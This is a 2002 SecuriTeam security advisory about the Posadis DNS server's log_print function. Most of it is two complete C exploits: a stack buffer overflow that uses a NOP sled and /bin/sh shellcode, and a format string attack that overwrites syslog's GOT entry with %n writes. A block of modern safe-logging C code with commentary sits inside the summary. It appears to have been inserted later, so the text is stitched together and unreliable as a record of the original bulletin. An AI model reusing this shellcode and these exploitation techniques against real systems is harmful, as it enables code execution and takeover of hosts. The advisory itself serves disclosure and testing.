[EXPL] Posadis Format String and Buffer Overflow Exploit Codes

From: support@securiteam.com
Date: 04/17/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 17 Apr 2002 20:04:57 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Posadis Format String and Buffer Overflow Exploit Codes
------------------------------------------------------------------------

SUMMARY

 <http://sourceforge.net/projects/posadis/> Posadis DNS server is a simple
DNS server designed for Win32 and Linux, which will support administration
through a web interface. Its log_print function is badly written: an
attacker can trigger a format string vulnerability in the product or
overflow an internal buffer, and both allow remote code execution. The
following are exploit codes that administrators can use to test their
servers for the mentioned vulnerabilities.
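The advisory describes two defects in one logging routine: caller-supplied text used as the format argument, and an unbounded copy into a fixed buffer. The following is an added example, not Posadis code (the real log_print is not shown on this page); it sketches the defective pattern in a comment and beside it a log_print written so that the message is always data, never format, and the line buffer cannot be overrun. LOG_LINE_MAX, safe_log_format and safe_log_print are assumed names for this illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not Posadis code. LOG_LINE_MAX and the two function
 * names below are assumptions made for this illustration. */
#define LOG_LINE_MAX 256

/* The defective pattern the advisory describes, shown as a comment only:
 *
 *     char line[LOG_LINE_MAX];
 *     strcpy(line, msg);          // unbounded copy: buffer overflow
 *     syslog(LOG_INFO, line);     // msg acts as the format: format string bug
 */

/* Builds "prefix: msg" into out (capacity outsz) and returns the length the
 * full line would have had, like snprintf, so the caller can detect
 * truncation. msg is always consumed through a fixed "%s" conversion, so
 * any '%' it contains is copied literally and never interpreted. */
size_t safe_log_format(char *out, size_t outsz, const char *prefix, const char *msg)
{
        int n = snprintf(out, outsz, "%s: %s", prefix, msg);
        if (n < 0) {
                if (outsz)
                        out[0] = '\0';
                return 0;
        }
        return (size_t)n;
}

/* Emits the line to stderr (a real server would hand it to
 * syslog(LOG_INFO, "%s", line), again with a fixed format) and returns 1 if
 * the line fit the buffer without truncation, 0 if it was cut. */
int safe_log_print(const char *prefix, const char *msg)
{
        char line[LOG_LINE_MAX];
        size_t need = safe_log_format(line, sizeof line, prefix, msg);

        fputs(line, stderr);
        fputc('\n', stderr);
        return need < sizeof line;
}
```

The check that matters for the second defect is the return value of safe_log_print: a caller that ignores it still cannot overflow, since snprintf bounds the write, but a defender reviewing logs will want to know when lines were cut.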

DETAILS

Exploit:
/* local posadis m5pre2 exploit by eSDee of Netric - (www.netric.org)
 * ------------------------------------------------------------------
 * The formatstring bug (discovered by kkr) is fixed in the log_print
 * function in m5pre2. However, there exists an unchecked buffer in
 * m5pre2 and prior, that can be exploited too.
 * ------------------------------------------------------------------
 */

#include <stdio.h>
#include <string.h>   /* memset */
#include <unistd.h>   /* execl */

char shellcode[]=
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int
main ()
{
        unsigned long ret = 0xbffff550;
        char buf[4068];
        int i=0;

        memset(buf, 0x90, sizeof(buf));

        /* place the shellcode after the NOP sled that fills buf */
        for (i = 0; i < sizeof(shellcode) - 1; i++) {
                buf[4000+i] = shellcode[i];
        }

        buf[4063] = (ret & 0x000000ff);
        buf[4064] = (ret & 0x0000ff00) >> 8;
        buf[4065] = (ret & 0x00ff0000) >> 16;
        buf[4066] = (ret & 0xff000000) >> 24;
        buf[4067] = '\0';

        printf("ret: 0x%x\n",ret);
        execl("./posadis", "posadis", buf, NULL);

        return 0;
}

/* local posadis m5pre1 exploit by eSDee of Netric - (www.netric.org)
 * ------------------------------------------------------------------
 *
 *
 * to find the retloc:
 * objdump -R posa-dis | grep syslog
 * 08063ddc R_386_JUMP_SLOT syslog
 *
 */

#include <stdio.h>
#include <string.h>   /* strlen, strcpy, strcat, memcpy */
#include <stdlib.h>   /* putenv */
#include <unistd.h>   /* execl */

#define RETLOC 0x08063ddc
#define RET 0xbffffdac

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int
padding(int write_byte, int already_written)
{
        int padding;
        write_byte += 0x100;
        already_written %= 0x100;
        padding = (write_byte - already_written) % 0x100;
        if (padding < 10)
                padding += 0x100;
        return padding;
}

int
main()
{
        char format[512],
                writecode[8],
                egg[1024],
                *ptr;
        int already_written = 0xfc,
                tmp,
                i;
        long *addr_ptr;

        ptr = egg;
        for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = 0x90;
        for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
        egg[1024 - 1] = '\0';

        memcpy(egg,"EGG=",4);
        putenv(egg);

        strcpy(format, "jjj");

        ptr = format+3;
        addr_ptr = (long *) ptr;

        for (i = 0; i < 4; i++) {
                *(addr_ptr++) = RETLOC + i;
                *(addr_ptr++) = 0xb0efb0ef;
        }
        *(ptr + 32) = 0;

        for (i = 0; i < 18; i++)
                strcat(format, "%08x.");

        for (i = 0; i <= 24; i += 8) {
                tmp = padding((RET >> i) & 0xff, already_written) + 10;
                sprintf(writecode, "%%%du%%n", tmp);
                strcat(format, writecode);
                already_written += tmp;
        }

        printf("local posadis m5pre1 exploit by eSDee of Netric - (www.netric.org)\n");
        printf("------------------------------------------------------------------\n");
        printf("return address : 0x%08x\n",RET);
        printf("return location: 0x%08x\n\n",RETLOC);

        execl("./posadis","posadis",format,NULL);

        return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:eSDee@netric.org> eSDee.

========================================


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
